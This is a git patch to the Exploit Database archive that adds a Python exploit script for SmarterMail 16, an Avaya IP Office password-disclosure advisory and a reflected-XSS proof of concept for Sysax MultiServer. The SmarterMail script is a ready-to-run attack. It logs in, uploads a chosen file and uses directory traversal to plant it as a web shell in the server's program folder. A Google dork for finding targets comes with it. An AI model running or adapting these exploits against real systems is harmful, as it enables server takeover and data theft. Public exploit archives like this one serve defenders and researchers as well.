From d2b3291be545c86f0a8eda65a411d5b44ae49e3d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 13 Jun 2020 05:01:56 +0000 Subject: [PATCH] DB: 2020-06-13 3 changes to exploits/shellcodes Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) SmarterMail 16 - Arbitrary File Upload Avaya IP Office 11 - Password Disclosure Sysax MultiServer 6.90 - Reflected Cross Site Scripting --- exploits/multiple/webapps/48580.py | 134 ++++++++++++++++++++++++++++ exploits/multiple/webapps/48581.txt | 93 +++++++++++++++++++ exploits/multiple/webapps/48582.txt | 17 ++++ files_exploits.csv | 5 +- 4 files changed, 248 insertions(+), 1 deletion(-) create mode 100755 exploits/multiple/webapps/48580.py create mode 100644 exploits/multiple/webapps/48581.txt create mode 100644 exploits/multiple/webapps/48582.txt diff --git a/exploits/multiple/webapps/48580.py b/exploits/multiple/webapps/48580.py new file mode 100755 index 000000000..4b2f40ede --- /dev/null +++ b/exploits/multiple/webapps/48580.py @@ -0,0 +1,134 @@ +# Exploit Title: SmarterMail 16 - Arbitrary File Upload +# Google Dork: inurl:/interface/root +# Date: 2020-06-10 +# Exploit Author: vvhack.org +# Vendor Homepage: https://www.smartertools.com +# Software Link: https://www.smartertools.com +# Version: 16.x +# Tested on: Windows +# CVE : N/A + +#!/usr/bin/python3 +import requests, json, argparse +from requests_toolbelt.multipart.encoder import MultipartEncoder + +#example usage: +#Authenticated +#python3 exp.py -w http://mail.site.com/ -f ast.aspx +#Change username & password ! + +class Tak: + + def __init__(self): + self.file_upload() + self.shell_upload() + + def loginned(self): + self.urls = results.wbsn + '/api/v1/auth/authenticate-user' + self.myobja = {"username":"mail@mail.com","password":"password","language":"en"} + self.xx = requests.post(self.urls, data = self.myobja) + self.data = json.loads(self.xx.text) + self.das = self.data['accessToken'] + self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'Authorization': "Bearer " + self.das} + + def loginned_folder(self): + self.loginned() + self.url = results.wbsn + '/api/v1/mail/messages' + myobj = {"folder":"drafts","ownerEmailAddress":"","sortType":5,"sortAscending":"false","query":"","skip":0,"take":151,"selectedIds":[]} + x = requests.post(self.url, data = myobj, headers=self.headers) + print(x.text) + + def create_folder(self): + self.loginned() + self.urlz = results.wbsn + '/api/v1/filestorage/folder-put' + myobj = {"folder": "testos1", "parentFolder":"Root Folder\\"} + myobj2= {"folder": "testos2", "parentFolder":"Root Folder\\"} + x = requests.post(self.urlz, data = myobj, headers=self.headers) + x = requests.post(self.urlz, data = myobj2, headers=self.headers) + print(x.text) + + def file_upload(self): + self.create_folder() + ''' + #resumableChunkNumber=1& + #resumableChunkSize=2097152&resumableCurrentChunkSize=955319&resumableTotalSize=955319& + #resumableType=image%2Fjpeg&resumableIdentifier=955319-112097jpg&resumableFilename=112097.jpg& + #resumableRelativePath=112097.jpg&resumableTotalChunks=1", headers={'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", + #'Accept-Language': "en-US,en;q=0.5", 'Accept-Encoding': "gzip, deflate", + #print(self.xz) + #print(self.xz.headers) + ''' + size = os.path.getsize(results.wbsf) + print(size) + replace_file = results.wbsf.replace(".","") + with open(results.wbsf, "rb") as outf: + contents = outf.read() + multipart_data = MultipartEncoder( + fields={ + "context": "file-storage", + #"contextData": '{"folder":"Root Folder\\ " + str(results.wbsd) + "\\"}', + "contextData": '{"folder":"Root Folder\\\\testos1\\\\"}', + "resumableChunkNumber": "1", + "resumableChunkSize": "2097152", + "resumableCurrentChunkSize": str(size), + "resumableTotalSize": str(size), + "resumableType": "image/jpeg", + #"resumableIdentifier": "955319-112097jpg", + "resumableIdentifier": str(size) + "-" + str(replace_file), + "resumableFilename": results.wbsf, + "resumableRelativePath": results.wbsf, + "resumableTotalChunks": "1", + "file": ( + 'blob',#112097.jpg', + #open(file, "rb"), + contents, + #file, + #"image/jpeg" + "application/octet-stream" + #'text/plain' + ) + + } +) + ''' + http_proxy = "http://127.0.0.1:8080" + proxyDict = { + "http" : http_proxy, + } + ''' + # if you want to activate intercept then add with that argument, this parameter is necessary requiresfunc(if you want to activate it, please remove it from the comment line.) >> proxies=proxyDict + self.dre = requests.post(url=results.wbsn + "/api/upload",headers={"Content-Type": multipart_data.content_type, + 'Authorization': "Bearer " + self.das, + 'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"},data=multipart_data) + + def shell_upload(self): + + ''' + http_proxy = "http://127.0.0.1:8080" + proxyDict = { + "http" : http_proxy, + } + ''' + + json_data = { + "folder": "Root Folder\\testos1\\", + "newFolderName": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\program files (x86)\\SmarterTools\\SmarterMail\\MRS\\testos1\\", + "parentFolder": "", + "newParentFolder": "Root Folder\\testos2" + } + #r = requests.post('http://mail.site.com/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers, proxies=proxyDict) + r = requests.post(results.wbsn+'/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers) + print(results.wbsn + "/testos1/" + results.wbsf) + +if __name__ == '__main__': + + parser = argparse.ArgumentParser() + parser.add_argument('-f', action='store', dest='wbsf', + help='Filename') + parser.add_argument('-w', action='store', dest='wbsn', + help='Target') + parser.add_argument('--version', action='version', version='SmartMail Knock Knock') + results = parser.parse_args() + + tako = Tak() + tako \ No newline at end of file diff --git a/exploits/multiple/webapps/48581.txt b/exploits/multiple/webapps/48581.txt new file mode 100644 index 000000000..c5ba5835c --- /dev/null +++ b/exploits/multiple/webapps/48581.txt @@ -0,0 +1,93 @@ +# Exploit Title: Avaya IP Office 11 - Password Disclosure +# Exploit Author: hyp3rlinx +# Date: 2020-06-09 +# Vender Homepage: https://downloads.avaya.com +# Product Link: https://downloads.avaya.com/css/P8/documents/101067493 +# CVE: CVE-2020-7030 + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.avaya.com + + +[Product] +Avaya IP Office v9.1.8.0 - 11 + +IP Office Platform provides a single, stackable, scalable small business communications system that grows with your business easily and cost-effectively. + + +[Vulnerability Type] +Insecure Transit Password Disclosure + + +[CVE Reference] +CVE-2020-7030 +ASA-2020-077 + + +[Security Issue] +A sensitive information disclosure vulnerability exists in the web interface component of IP Office that +may potentially allow a local user to gain unauthorized access to the component. + +The request URL on port 7071 and the web socket component requests on port 7070 used by Atmosphere-Framework +within Avaya IP Office, pass Base64 encoded credentials as part of the URL query string. + +https://:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y&referrer=https://x.x.x.x:7070&lang=en_US + +wss://:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0& +X-Atmosphere-Framework=2.0.5-javascript&X-Atmosphere-Transport=websocket&X-Cache-Date=0&Content-Type=text/x-gwt-rpc;%20charset=UTF-8&X-atmo-protocol=true + +Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y +Value: Administrator:Administrator + +The Base64 encoded credentials can be easily disclosed if the machine used to logon to the web Manager is accessed by an attacker. +The URL plus the credentials can potentially be leaked or stored in some of the following locations. + +Browser History +Browser Cache +Browser Developer Tools +Cached by web proxy +Referer Header +Web Logs +Shared Systems + + +[Avaya Products affected] +Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2 + + +[References] +https://downloads.avaya.com/css/P8/documents/101067493 + + +[Network Access] +Remote + + +[Severity] +Medium + + +[Disclosure Timeline] +Vendor Notification: February 19, 2020 +Vendor confirms issue: March 4, 2020 +Vendor release advisory fix : June 3, 2020 +June 4, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/multiple/webapps/48582.txt b/exploits/multiple/webapps/48582.txt new file mode 100644 index 000000000..d52249d0a --- /dev/null +++ b/exploits/multiple/webapps/48582.txt @@ -0,0 +1,17 @@ + # Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting +# Google Dork: n.d. +# Date: 2020-06-02 +# Exploit Author: Luca Epifanio (wrongsid3) +# Vendor Homepage: https://www.sysax.com/ +# Software Link: https://www.sysax.com/download.htm +# Version: MultiServer 6.90 +# Tested on: Windows 10 x64 +# CVE : CVE-2020-13228 + +There is reflected XSS via the /scgi sid parameter. + +PoC: +http://192.168.88.131/scgi?sid=684216c78659562c92775c885e956585cdb180fd +&pid=transferpage2_name1_fff.htm + +PoC Screen: https://pasteboard.co/J9eE2GQ.png \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1364a99ad..9156dcf38 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42802,5 +42802,8 @@ id,file,description,date,author,type,platform,port 48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php, 48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php, 48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php, -48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, +48572,exploits/php/webapps/48572.txt,"Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php, 48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php, +48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple, +48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple, +48582,exploits/multiple/webapps/48582.txt,"Sysax MultiServer 6.90 - Reflected Cross Site Scripting",2020-06-12,"Luca Epifanio",webapps,multiple,